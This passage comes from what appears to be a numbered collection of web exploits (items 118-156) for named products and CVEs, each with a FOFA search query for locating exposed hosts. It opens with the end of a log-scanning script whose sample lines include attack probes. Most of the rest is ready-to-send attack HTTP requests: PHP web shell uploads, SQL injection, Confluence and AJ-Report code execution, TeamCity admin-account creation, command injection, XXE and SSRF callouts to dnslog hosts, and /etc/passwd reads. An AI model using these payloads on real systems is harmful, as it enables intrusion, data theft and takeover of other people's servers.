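    '10.0.0.5 - - [12/Jan/2024:10:00:01 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Jan/2024:10:00:02 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 200 0',
    '10.0.0.6 - - [12/Jan/2024:10:00:03 +0000] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 0',
    '10.0.0.7 - - [12/Jan/2024:10:00:04 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 0',
    '10.0.0.8 - - [12/Jan/2024:10:00:05 +0000] "POST /cli?remoting=false HTTP/1.1" 200 0',
    '10.0.0.9 - - [12/Jan/2024:10:00:06 +0000] "GET /index.html HTTP/1.1" 200 1024',
    "10.0.0.9 - - [12/Jan/2024:10:00:07 +0000] \"GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\" 200 0",
]


def scan_log(lines):
    """Return [(line_no, client_ip, [matched rule names])] for every line that hits at least one rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; a real pipeline would count and report these
        ip, method, target = m.group(1), m.group(5), m.group(6)
        probe = "%s %s" % (method, unquote(target))  # decode once so %3b and friends still match
        matched = [name for name, rx in RULES if rx.search(probe)]
        if matched:
            hits.append((n, ip, matched))
    return hits


if __name__ == "__main__":
    for n, ip, names in scan_log(SAMPLE_LOG):
        print("line %d %s: %s" % (n, ip, ", ".join(names)))
```

Run it over a real access log with scan_log(open(path).readlines()); a hit is a reason to pull the full request and check the product version, not proof of compromise, since scanners fire these probes indiscriminately.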
118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

The txt_path field controls where the file is written. Then access /home/src.php; the web shell runs the command passed in the passwd POST parameter.

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based blind injection in the id field: the response is delayed by 5 seconds when the database name is 3 characters long.

120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

Uploaded file path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA: title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA: app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA: body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

File path: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA: icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA: title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA: body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA: app="Adobe-ColdFusion"
PAYLOAD
129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA: app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer-service system arbitrary file upload
FOFA: icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA: icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA: body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (H5 云商城) file.php file upload
FOFA: body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA: app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA: app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA: title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communications command-and-dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communications command-and-dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communications command-and-dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communications command-and-dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA: body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (科立讯) communications command-and-dispatch management platform ajax_users.php SQL injection
FOFA: body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA: body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA: title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA: app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA: icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA: app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA: body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA: body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA: title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA: title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA: body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA: body="__gradio_mode__"
Step 1: request /config to obtain the component id
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire-rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA: body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
